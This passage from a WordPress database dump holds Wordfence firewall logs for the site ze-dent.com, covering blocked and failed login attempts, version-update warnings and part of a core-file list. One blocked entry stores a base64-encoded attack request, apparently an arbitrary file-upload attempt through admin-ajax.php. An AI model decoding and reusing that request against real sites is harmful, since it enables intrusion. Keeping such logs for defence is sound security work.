(5416, 1596915631.708688, 1596915631.608900, 0x00000000000000000000ffffc1a9fc25, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5417, 0.000000, 1596916174.713421, 0x00000000000000000000ffffb2143710, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(5418, 0.000000, 1596923436.108941, 0x00000000000000000000ffffb955ef6e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5419, 0.000000, 1596931289.632611, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5420, 0.000000, 1596939347.413618, 0x00000000000000000000ffffb221e954, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'loginFailInvalidUsername', NULL, NULL),
(5421, 0.000000, 1596947136.641550, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5422, 0.000000, 1596949391.705424, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5423, 0.000000, 1596950547.222545, 0x00000000000000000000ffffc05f1e3b, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL);
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(5424, 1596961105.160866, 1596961105.070000, 0x00000000000000000000ffffb9d49470, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99', 'blocked:waf', 'WAF-RULE-260', '{\"learningMode\":0,\"failedRules\":\"260\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"whitelist\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQ29va2llOiBodW1hbnNfMjE5MDk9MTsgYmVnZXQ9YmVnZXRvazsKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzUuMC4zNzcwLjEwMCBTYWZhcmkvNTM3LjM2IE9QUi82Mi4wLjMzMzEuOTkKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpEbnQ6IDEKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUztxPTAuOSxlbjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43IgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQ29ubmVjdGlvbjogY2xvc2UKWC1BY2NlbC1JbnRlcm5hbDogL2ludGVybmFsLW5naW54LXN0YXRpYy1sb2NhdGlvbgpYLVJlYWwtSXA6IDE4NS4yMTIuMTQ4LjExMgpIb3N0OiB3d3cuemUtZGVudC5jb20KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0wN2EwYWI3MTFmMGQ4ODdhM2I1MTc5YzhhY2JkODRjMWQ2YTc3Njc2CkNvbnRlbnQtTGVuZ3RoOiA2NTEKCi0tMDdhMGFiNzExZjBkODg3YTNiNTE3OWM4YWNiZDg0YzFkNmE3NzY3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImFjdGlvbiIKCl9uaW5nX3VwbG9hZF9pbWFnZQotLTA3YTBhYjcxMWYwZDg4N2EzYjUxNzljOGFjYmQ4NGMxZDZhNzc2NzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJhbGxvd2VkX2ZpbGVfdHlwZXMiCgp0eHQKLS0wN2EwYWI3MTFmMGQ4ODdhM2I1MTc5YzhhY2JkODRjMWQ2YTc3Njc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBsb2FkIgoKeyJkaXIiOiIuLlwvd3AtY29udGVudFwvdXBsb2Fkc1wvIiwiZm9sZGVyIjoiIiwic3JjIjoiIn0KLS0wN2EwYWI3MTFmMGQ4ODdhM2I1MTc5YzhhY2JkODRjMWQ2YTc3Njc2LS0K\"}'),
(5425, 0.000000, 1596963831.816485, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5426, 0.000000, 1596967169.940267, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5427, 0.000000, 1596976892.433495, 0x00000000000000000000ffffc0630ec7, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5428, 0.000000, 1596981898.530449, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5429, 0.000000, 1596987996.943516, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5430, 0.000000, 1597000736.955045, 0x00000000000000000000ffffb9dc64f3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5431, 0.000000, 1597014964.718091, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5432, 0.000000, 1597023320.139755, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5433, 0.000000, 1597032708.221946, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5434, 0.000000, 1597034418.332390, 0x00000000000000000000ffffb2207bcc, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5435, 0.000000, 1597041057.753897, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfhoover`
--

CREATE TABLE `zdenl_wfhoover` (
  `id` int(10) UNSIGNED NOT NULL,
  `owner` text,
  `host` text,
  `path` text,
  `hostKey` varbinary(124) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfissues`
--

CREATE TABLE `zdenl_wfissues` (
  `id` int(10) UNSIGNED NOT NULL,
  `time` int(10) UNSIGNED NOT NULL,
  `lastUpdated` int(10) UNSIGNED NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) UNSIGNED NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfissues`
--

INSERT INTO `zdenl_wfissues` (`id`, `time`, `lastUpdated`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES
(382, 1596980694, 1596980694, 'new', 'wfUpgrade', 75, '3b469c1b0fdead7cd60fdb3c10ff8ca5', '3b469c1b0fdead7cd60fdb3c10ff8ca5', 'Your WordPress version is out of date', 'WordPress version 5.4.2 is now available. Please upgrade immediately to get the latest security updates from WordPress.', 'a:2:{s:14:\"currentVersion\";s:5:\"5.3.4\";s:10:\"newVersion\";s:5:\"5.4.2\";}'),
(383, 1596980694, 1596980694, 'new', 'wfPluginUpgrade', 50, '5b45567b60ea8c3fab285d5384bb3d2c', '5b45567b60ea8c3fab285d5384bb3d2c', 'The Plugin \"Wordfence Security\" needs an upgrade (7.4.5 -> 7.4.10).', 'You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.', 'a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.4.5\";s:11:\"Description\";s:140:\"Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite><a href=\"http://www.wordfence.com/\">Wordfence</a> tarafından.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:79:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:6:\"7.4.10\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfknownfilelist`
--

CREATE TABLE `zdenl_wfknownfilelist` (
  `id` int(11) UNSIGNED NOT NULL,
  `path` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfknownfilelist`
--

INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(1, 'index.php'),
(2, 'license.txt'),
(3, 'readme.html'),
(4, 'wordfence-waf.php'),
(5, 'wp-activate.php'),
(6, 'wp-admin/about.php'),
(7, 'wp-admin/admin-ajax.php'),
(8, 'wp-admin/admin-footer.php'),
(9, 'wp-admin/admin-functions.php'),
(10, 'wp-admin/admin-header.php'),
(11, 'wp-admin/admin-post.php'),
(12, 'wp-admin/admin.php'),
(13, 'wp-admin/async-upload.php'),
(14, 'wp-admin/comment.php'),
(15, 'wp-admin/credits.php'),
(16, 'wp-admin/css/about-rtl.css'),
(17, 'wp-admin/css/about-rtl.min.css'),
(18, 'wp-admin/css/about.css'),
(19, 'wp-admin/css/about.min.css'),
(20, 'wp-admin/css/admin-menu-rtl.css'),
(21, 'wp-admin/css/admin-menu-rtl.min.css'),
(22, 'wp-admin/css/admin-menu.css'),
(23, 'wp-admin/css/admin-menu.min.css'),
(24, 'wp-admin/css/code-editor-rtl.css'),
(25, 'wp-admin/css/code-editor-rtl.min.css'),
(26, 'wp-admin/css/code-editor.css'),
(27, 'wp-admin/css/code-editor.min.css'),
(28, 'wp-admin/css/color-picker-rtl.css'),
(29, 'wp-admin/css/color-picker-rtl.min.css'),
(30, 'wp-admin/css/color-picker.css'),
(31, 'wp-admin/css/color-picker.min.css'),
(32, 'wp-admin/css/colors/_admin.scss'),
(33, 'wp-admin/css/colors/_mixins.scss'),
(34, 'wp-admin/css/colors/_variables.scss'),
(35, 'wp-admin/css/colors/blue/colors-rtl.css'),
(36, 'wp-admin/css/colors/blue/colors-rtl.min.css'),
(37, 'wp-admin/css/colors/blue/colors.css'),
(38, 'wp-admin/css/colors/blue/colors.min.css'),
(39, 'wp-admin/css/colors/blue/colors.scss'),
(40, 'wp-admin/css/colors/coffee/colors-rtl.css'),
(41, 'wp-admin/css/colors/coffee/colors-rtl.min.css'),
(42, 'wp-admin/css/colors/coffee/colors.css'),
(43, 'wp-admin/css/colors/coffee/colors.min.css'),
(44, 'wp-admin/css/colors/coffee/colors.scss'),
(45, 'wp-admin/css/colors/ectoplasm/colors-rtl.css'),
(46, 'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),
(47, 'wp-admin/css/colors/ectoplasm/colors.css'),
(48, 'wp-admin/css/colors/ectoplasm/colors.min.css'),
(49, 'wp-admin/css/colors/ectoplasm/colors.scss'),
(50, 'wp-admin/css/colors/light/colors-rtl.css'),
(51, 'wp-admin/css/colors/light/colors-rtl.min.css'),
(52, 'wp-admin/css/colors/light/colors.css'),
(53, 'wp-admin/css/colors/light/colors.min.css'),
(54, 'wp-admin/css/colors/light/colors.scss'),
(55, 'wp-admin/css/colors/midnight/colors-rtl.css'),
(56, 'wp-admin/css/colors/midnight/colors-rtl.min.css'),
(57, 'wp-admin/css/colors/midnight/colors.css'),
(58, 'wp-admin/css/colors/midnight/colors.min.css'),
(59, 'wp-admin/css/colors/midnight/colors.scss'),
(60, 'wp-admin/css/colors/ocean/colors-rtl.css'),
(61, 'wp-admin/css/colors/ocean/colors-rtl.min.css'),
(62, 'wp-admin/css/colors/ocean/colors.css'),
(63, 'wp-admin/css/colors/ocean/colors.min.css'),
(64, 'wp-admin/css/colors/ocean/colors.scss'),
(65, 'wp-admin/css/colors/sunrise/colors-rtl.css'),
(66, 'wp-admin/css/colors/sunrise/colors-rtl.min.css'),
(67, 'wp-admin/css/colors/sunrise/colors.css'),
(68, 'wp-admin/css/colors/sunrise/colors.min.css'),
(69, 'wp-admin/css/colors/sunrise/colors.scss'),
(70, 'wp-admin/css/common-rtl.css'),
(71, 'wp-admin/css/common-rtl.min.css'),
(72, 'wp-admin/css/common.css'),
(73, 'wp-admin/css/common.min.css'),
(74, 'wp-admin/css/customize-controls-rtl.css'),
(75, 'wp-admin/css/customize-controls-rtl.min.css'),
(76, 'wp-admin/css/customize-controls.css'),
(77, 'wp-admin/css/customize-controls.min.css'),
(78, 'wp-admin/css/customize-nav-menus-rtl.css'),
(79, 'wp-admin/css/customize-nav-menus-rtl.min.css'),
(80, 'wp-admin/css/customize-nav-menus.css'),
(81, 'wp-admin/css/customize-nav-menus.min.css'),
(82, 'wp-admin/css/customize-widgets-rtl.css'),
(83, 'wp-admin/css/customize-widgets-rtl.min.css'),
(84, 'wp-admin/css/customize-widgets.css'),
(85, 'wp-admin/css/customize-widgets.min.css'),
(86, 'wp-admin/css/dashboard-rtl.css'),
(87, 'wp-admin/css/dashboard-rtl.min.css'),
(88, 'wp-admin/css/dashboard.css'),
(89, 'wp-admin/css/dashboard.min.css'),
(90, 'wp-admin/css/deprecated-media-rtl.css'),
(91, 'wp-admin/css/deprecated-media-rtl.min.css'),
(92, 'wp-admin/css/deprecated-media.css'),
(93, 'wp-admin/css/deprecated-media.min.css'),
(94, 'wp-admin/css/edit-rtl.css'),
(95, 'wp-admin/css/edit-rtl.min.css'),
(96, 'wp-admin/css/edit.css'),
(97, 'wp-admin/css/edit.min.css'),
(98, 'wp-admin/css/farbtastic-rtl.css'),
(99, 'wp-admin/css/farbtastic-rtl.min.css'),
(100, 'wp-admin/css/farbtastic.css'),
(101, 'wp-admin/css/farbtastic.min.css'),
(102, 'wp-admin/css/forms-rtl.css'),
(103, 'wp-admin/css/forms-rtl.min.css'),
(104, 'wp-admin/css/forms.css'),
(105, 'wp-admin/css/forms.min.css'),
(106, 'wp-admin/css/ie-rtl.css'),
(107, 'wp-admin/css/ie-rtl.min.css'),
(108, 'wp-admin/css/ie.css'),
(109, 'wp-admin/css/ie.min.css'),
(110, 'wp-admin/css/install-rtl.css'),
(111, 'wp-admin/css/install-rtl.min.css'),
(112, 'wp-admin/css/install.css'),
(113, 'wp-admin/css/install.min.css'),
(114, 'wp-admin/css/l10n-rtl.css'),
(115, 'wp-admin/css/l10n-rtl.min.css'),
(116, 'wp-admin/css/l10n.css'),
(117, 'wp-admin/css/l10n.min.css'),
(118, 'wp-admin/css/list-tables-rtl.css'),
(119, 'wp-admin/css/list-tables-rtl.min.css'),
(120, 'wp-admin/css/list-tables.css'),
(121, 'wp-admin/css/list-tables.min.css'),
(122, 'wp-admin/css/login-rtl.css'),
(123, 'wp-admin/css/login-rtl.min.css'),
(124, 'wp-admin/css/login.css'),
(125, 'wp-admin/css/login.min.css'),
(126, 'wp-admin/css/media-rtl.css'),
(127, 'wp-admin/css/media-rtl.min.css'),
(128, 'wp-admin/css/media.css'),
(129, 'wp-admin/css/media.min.css'),
(130, 'wp-admin/css/nav-menus-rtl.css'),
(131, 'wp-admin/css/nav-menus-rtl.min.css'),
(132, 'wp-admin/css/nav-menus.css'),
(133, 'wp-admin/css/nav-menus.min.css'),
(134, 'wp-admin/css/revisions-rtl.css'),
(135, 'wp-admin/css/revisions-rtl.min.css'),
(136, 'wp-admin/css/revisions.css'),
(137, 'wp-admin/css/revisions.min.css'),
(138, 'wp-admin/css/site-health-rtl.css'),
(139, 'wp-admin/css/site-health-rtl.min.css'),
(140, 'wp-admin/css/site-health.css'),
(141, 'wp-admin/css/site-health.min.css'),
(142, 'wp-admin/css/site-icon-rtl.css'),
(143, 'wp-admin/css/site-icon-rtl.min.css'),
(144, 'wp-admin/css/site-icon.css'),
(145, 'wp-admin/css/site-icon.min.css'),
(146, 'wp-admin/css/themes-rtl.css'),
(147, 'wp-admin/css/themes-rtl.min.css'),
(148, 'wp-admin/css/themes.css'),
(149, 'wp-admin/css/themes.min.css'),
(150, 'wp-admin/css/widgets-rtl.css'),
(151, 'wp-admin/css/widgets-rtl.min.css'),
(152, 'wp-admin/css/widgets.css'),
(153, 'wp-admin/css/widgets.min.css'),
(154, 'wp-admin/css/wp-admin-rtl.css'),
(155, 'wp-admin/css/wp-admin-rtl.min.css'),
(156, 'wp-admin/css/wp-admin.css'),
(157, 'wp-admin/css/wp-admin.min.css'),
(158, 'wp-admin/custom-background.php'),
(159, 'wp-admin/custom-header.php'),
(160, 'wp-admin/customize.php'),
(161, 'wp-admin/edit-comments.php'),
(162, 'wp-admin/edit-form-advanced.php'),
(163, 'wp-admin/edit-form-blocks.php'),
(164, 'wp-admin/edit-form-comment.php'),
(165, 'wp-admin/edit-link-form.php'),
(166, 'wp-admin/edit-tag-form.php'),
(167, 'wp-admin/edit-tags.php'),
(168, 'wp-admin/edit.php'),
(169, 'wp-admin/erase-personal-data.php'),
(170, 'wp-admin/export-personal-data.php'),
(171, 'wp-admin/export.php'),
(172, 'wp-admin/freedoms.php'),
(173, 'wp-admin/images/align-center-2x.png'),
(174, 'wp-admin/images/align-center.png'),
(175, 'wp-admin/images/align-left-2x.png'),
(176, 'wp-admin/images/align-left.png'),
(177, 'wp-admin/images/align-none-2x.png'),
(178, 'wp-admin/images/align-none.png'),
(179, 'wp-admin/images/align-right-2x.png'),
(180, 'wp-admin/images/align-right.png'),
(181, 'wp-admin/images/arrows-2x.png'),
(182, 'wp-admin/images/arrows.png'),
(183, 'wp-admin/images/browser-rtl.png'),
(184, 'wp-admin/images/browser.png'),
(185, 'wp-admin/images/bubble_bg-2x.gif'),
(186, 'wp-admin/images/bubble_bg.gif'),
(187, 'wp-admin/images/comment-grey-bubble-2x.png'),
(188, 'wp-admin/images/comment-grey-bubble.png'),
(189, 'wp-admin/images/date-button-2x.gif'),
(190, 'wp-admin/images/date-button.gif'),
(191, 'wp-admin/images/generic.png'),
(192, 'wp-admin/images/icons32-2x.png'),
(193, 'wp-admin/images/icons32-vs-2x.png'),
(194, 'wp-admin/images/icons32-vs.png'),
(195, 'wp-admin/images/icons32.png'),
(196, 'wp-admin/images/imgedit-icons-2x.png'),
(197, 'wp-admin/images/imgedit-icons.png'),
(198, 'wp-admin/images/list-2x.png'),
(199, 'wp-admin/images/list.png'),
(200, 'wp-admin/images/loading.gif'),
(201, 'wp-admin/images/marker.png'),
(202, 'wp-admin/images/mask.png'),
(203, 'wp-admin/images/media-button-2x.png'),
(204, 'wp-admin/images/media-button-image.gif'),
(205, 'wp-admin/images/media-button-music.gif'),
(206, 'wp-admin/images/media-button-other.gif'),
(207, 'wp-admin/images/media-button-video.gif'),
(208, 'wp-admin/images/media-button.png'),
(209, 'wp-admin/images/menu-2x.png'),
(210, 'wp-admin/images/menu-vs-2x.png'),
(211, 'wp-admin/images/menu-vs.png'),
(212, 'wp-admin/images/menu.png'),
(213, 'wp-admin/images/no.png'),
(214, 'wp-admin/images/post-formats-vs.png'),
(215, 'wp-admin/images/post-formats.png'),
(216, 'wp-admin/images/post-formats32-vs.png'),
(217, 'wp-admin/images/post-formats32.png'),
(218, 'wp-admin/images/resize-2x.gif'),
(219, 'wp-admin/images/resize-rtl-2x.gif'),
(220, 'wp-admin/images/resize-rtl.gif'),
(221, 'wp-admin/images/resize.gif'),
(222, 'wp-admin/images/se.png'),
(223, 'wp-admin/images/sort-2x.gif'),
(224, 'wp-admin/images/sort.gif'),
(225, 'wp-admin/images/spinner-2x.gif'),
(226, 'wp-admin/images/spinner.gif'),
(227, 'wp-admin/images/stars-2x.png'),
(228, 'wp-admin/images/stars.png'),
(229, 'wp-admin/images/w-logo-blue.png'),
(230, 'wp-admin/images/w-logo-white.png'),
(231, 'wp-admin/images/wheel.png'),
(232, 'wp-admin/images/wordpress-logo-white.svg'),
(233, 'wp-admin/images/wordpress-logo.png'),
(234, 'wp-admin/images/wordpress-logo.svg'),
(235, 'wp-admin/images/wpspin_light-2x.gif'),
(236, 'wp-admin/images/wpspin_light.gif'),
(237, 'wp-admin/images/xit-2x.gif'),
(238, 'wp-admin/images/xit.gif'),
(239, 'wp-admin/images/yes.png'),
(240, 'wp-admin/import.php'),
(241, 'wp-admin/includes/admin-filters.php'),
(242, 'wp-admin/includes/admin.php'),
(243, 'wp-admin/includes/ajax-actions.php'),
(244, 'wp-admin/includes/bookmark.php'),
(245, 'wp-admin/includes/class-automatic-upgrader-skin.php'),
(246, 'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),
(247, 'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),
(248, 'wp-admin/includes/class-bulk-upgrader-skin.php'),
(249, 'wp-admin/includes/class-core-upgrader.php'),
(250, 'wp-admin/includes/class-custom-background.php'),
(251, 'wp-admin/includes/class-custom-image-header.php'),
(252, 'wp-admin/includes/class-file-upload-upgrader.php'),
(253, 'wp-admin/includes/class-ftp-pure.php'),
(254, 'wp-admin/includes/class-ftp-sockets.php'),
(255, 'wp-admin/includes/class-ftp.php'),
(256, 'wp-admin/includes/class-language-pack-upgrader-skin.php'),
(257, 'wp-admin/includes/class-language-pack-upgrader.php'),
(258, 'wp-admin/includes/class-pclzip.php'),
(259, 'wp-admin/includes/class-plugin-installer-skin.php'),
(260, 'wp-admin/includes/class-plugin-upgrader-skin.php'),
(261, 'wp-admin/includes/class-plugin-upgrader.php'),
(262, 'wp-admin/includes/class-theme-installer-skin.php'),
(263, 'wp-admin/includes/class-theme-upgrader-skin.php'),
(264, 'wp-admin/includes/class-theme-upgrader.php'),
(265, 'wp-admin/includes/class-walker-category-checklist.php'),
(266, 'wp-admin/includes/class-walker-nav-menu-checklist.php'),
(267, 'wp-admin/includes/class-walker-nav-menu-edit.php'),
(268, 'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),
(269, 'wp-admin/includes/class-wp-automatic-updater.php'),
(270, 'wp-admin/includes/class-wp-comments-list-table.php'),
(271, 'wp-admin/includes/class-wp-community-events.php'),
(272, 'wp-admin/includes/class-wp-debug-data.php'),
(273, 'wp-admin/includes/class-wp-filesystem-base.php'),
(274, 'wp-admin/includes/class-wp-filesystem-direct.php'),
(275, 'wp-admin/includes/class-wp-filesystem-ftpext.php'),
(276, 'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),
(277, 'wp-admin/includes/class-wp-filesystem-ssh2.php'),
(278, 'wp-admin/includes/class-wp-importer.php'),
(279, 'wp-admin/includes/class-wp-internal-pointers.php'),
(280, 'wp-admin/includes/class-wp-links-list-table.php'),
(281, 'wp-admin/includes/class-wp-list-table-compat.php'),
(282, 'wp-admin/includes/class-wp-list-table.php'),
(283, 'wp-admin/includes/class-wp-media-list-table.php'),
(284, 'wp-admin/includes/class-wp-ms-sites-list-table.php'),
(285, 'wp-admin/includes/class-wp-ms-themes-list-table.php'),
(286, 'wp-admin/includes/class-wp-ms-users-list-table.php'),
(287, 'wp-admin/includes/class-wp-plugin-install-list-table.php'),
(288, 'wp-admin/includes/class-wp-plugins-list-table.php'),
(289, 'wp-admin/includes/class-wp-post-comments-list-table.php'),
(290, 'wp-admin/includes/class-wp-posts-list-table.php'),
(291, 'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),
(292, 'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),
(293, 'wp-admin/includes/class-wp-privacy-policy-content.php'),
(294, 'wp-admin/includes/class-wp-privacy-requests-table.php'),
(295, 'wp-admin/includes/class-wp-screen.php'),
(296, 'wp-admin/includes/class-wp-site-health-auto-updates.php'),
(297, 'wp-admin/includes/class-wp-site-health.php'),
(298, 'wp-admin/includes/class-wp-site-icon.php'),
(299, 'wp-admin/includes/class-wp-terms-list-table.php'),
(300, 'wp-admin/includes/class-wp-theme-install-list-table.php'),
